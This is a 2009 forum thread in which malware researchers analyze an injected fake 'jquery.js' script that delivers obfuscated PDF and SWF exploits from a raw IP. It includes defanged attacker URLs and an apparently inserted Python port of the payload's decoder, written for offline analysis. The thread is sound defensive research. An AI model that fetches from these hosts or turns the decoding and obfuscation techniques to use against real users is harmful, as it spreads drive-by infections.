Malware Domain List
Malware Related => Malicious Domains => Zlkon.lv => Topic started by: sowhat-x on April 07, 2009, 04:31:11 am
-
Ok now, that's a pretty "funky" one...
It's been injected into misconfigured sites out there during the last week - you can easily find a few example complaints via Google:
http://www.google.com/search?q=94.247.2.195%2Fjquery.js
hxxp://94.247.2.195/jquery.js
--->
hxxp://94.247.2.195/news/?id=100
So far it can be trivially decoded thanks to Malzilla, and shows us the following...
hxxp://94.247.2.195/news/?id=2
Which is a pointer to a pdf - Result: 0/40 (0.00%):
http://www.virustotal.com/analisis/e85487bf540c8011c2aafd4369109df3
Plus, a pointer to a swf as well - Result: 0/40 (0.00%):
hxxp://94.247.2.195/news/?id=3
http://www.virustotal.com/analisis/b17f0747e571ab126f95bad30bc0ad21
I'm not really able to successfully decode them statically without executing them though, any ideas?
I've got the impression that the .swf is more or less the container of an xor key,
that is being used in order for the pdf's contents to be decoded...
Or am I in a completely wrong direction, and should I better go grab myself some extra coffee?... ::)
Password is "infected", as always...
-
I think you could be right :( ..... the following is the uncompressed output from the PDF:
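As I read that PDF output, the decoder is a junk-token filter in front of a base64 variant with a shuffled alphabet, and then eval(). The following is an added example (not code from the post or from the sample) that reimplements both stages in Python so they can be reproduced offline; the token list is taken from the `gt` regex, and the alphabet is my reconstruction of the `k` string, which may differ from the original if the forum copy altered it.

```python
import re

# Ten junk tokens that the payload's `gt` regex deletes before decoding,
# taken as literal strings from the posted code.
JUNK_TOKENS = [",<@:", ">-@", "@:->;", ",;:, ", ". ", "><.-", "-.;.",
               ";;,@>", " ,.", "-@<@"]
JUNK_RE = re.compile("|".join(re.escape(t) for t in JUNK_TOKENS))

# Shuffled alphabet reconstructed from the decoder's `k` string (assumption:
# the forum copy is otherwise intact). It holds all 64 base64 symbols plus
# '=', so slot 64 ('u') is what the original `!= 64` padding checks target.
ALPHABET = "eZCd05WgRrAn1j+S2PcMhB4wfODEy96tivp=lHmJzoYNkGX8FLVTqQ3asxUIb7/Ku"


def strip_junk(text: str) -> str:
    """Same effect as the payload's .replace(gt, '')."""
    return JUNK_RE.sub("", text)


def custom_b64_decode(text: str, alphabet: str = ALPHABET) -> bytes:
    """Port of the payload's g3(): four alphabet indices -> up to three bytes.
    Characters outside slots 0..63 (slot 64 or unknown) count as padding."""
    out = bytearray()
    j = 0
    while j < len(text):
        e = []
        for _ in range(4):
            idx = alphabet.find(text[j]) if j < len(text) else -1
            e.append(idx if 0 <= idx < 64 else 64)
            j += 1
        out.append(((e[0] << 2) | (e[1] >> 4)) & 0xFF)
        if e[2] != 64:
            out.append((((e[1] & 15) << 4) | (e[2] >> 2)) & 0xFF)
        if e[3] != 64:
            out.append((((e[2] & 3) << 6) | e[3]) & 0xFF)
    return bytes(out)


def custom_b64_encode(data: bytes, alphabet: str = ALPHABET) -> str:
    """Inverse of custom_b64_decode; used to build constructed test input."""
    pad = alphabet[64] if len(alphabet) > 64 else "="
    chunks = []
    for i in range(0, len(data), 3):
        part = data[i:i + 3]
        n = int.from_bytes(part.ljust(3, b"\0"), "big")
        sym = [alphabet[(n >> s) & 63] for s in (18, 12, 6, 0)]
        for k in range(len(part) + 1, 4):  # pad the slots with no input byte
            sym[k] = pad
        chunks.append("".join(sym))
    return "".join(chunks)
```

Running `custom_b64_decode(strip_junk(blob))` on the stripped stage gives the bytes the payload hands to eval(), which is the part worth reading in a sandbox rather than executing.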
-
Wepawet does the job.
http://wepawet.cs.ucsb.edu/view.php?hash=c3268e4f6babb9f7b0c1c9dc0d75937e&type=js
http://wepawet.cs.ucsb.edu/view.php?hash=2471c74881c594faf9a2a711117bd250&type=js
-
Nice one :)
-
The .js is easy, thanks for the pdf - but for the swf file though?
That's what puzzled me the most... Flasm ain't really got support for Flash 9, so it couldn't decompile it.
Then I've also tested 2 commercial Flash decompilers/disassemblers, and both of them kept crashing, he-he, I wonder why... ;D
The closest I could get to disassembling it was via abcdump here:
http://iteratif.free.fr/blog/index.php?2006/11/15/61-un-premier-decompileur-as3
-
Here's abcdump's output, for the sake of easiness...
-
I have already listed it last week. As far as I remember, CkreM had reported it by PM.
http://www.malwaredomainlist.com/mdl.php?search=94.247.2.195&colsearch=All&quantity=50
http://wepawet.cs.ucsb.edu/view.php?hash=8ab5ba43d0bae3147df34833157a1fbf&t=1238716023&type=js
-
The xor key there has a totally different usage than what I had thought originally above... and here's the idea/concept behind it, more or less:
http://blog.dannypatterson.com/?p=135
And now, go check out this paper as well... guys, it's not really good news - but I think we're getting a bit closer regarding how this crap works:
http://www.aladdin.com/pdf/airc/airc-report-jan-09.pdf
-
By the way, the domain mentioned in the paper is in the list from back in early January... hardmoviesporno.com namely.
So, now I guess we know where to start in order to decrypt this kind of crap as well, but it's pretty cumbersome doing so by hand, pfff.... :(
One more note... in case anyone wants/needs an updated ActionScript disassembler with a GUI as well:
http://www.docsultant.com/nemo440/
-
Nice one :)
-
sowhat-x:
Hi,
Sorry, but I didn't spot your message earlier. The system failed to notify me. I'm on-call the whole Easter so I'm pretty busy, but I'll definitely take a closer look when I have time. I can say though that the flash contains another flash that is in xorred mode. I haven't had a chance yet to decrypt it, but I'll have a whack at it asap. I'll post you an update when I have something.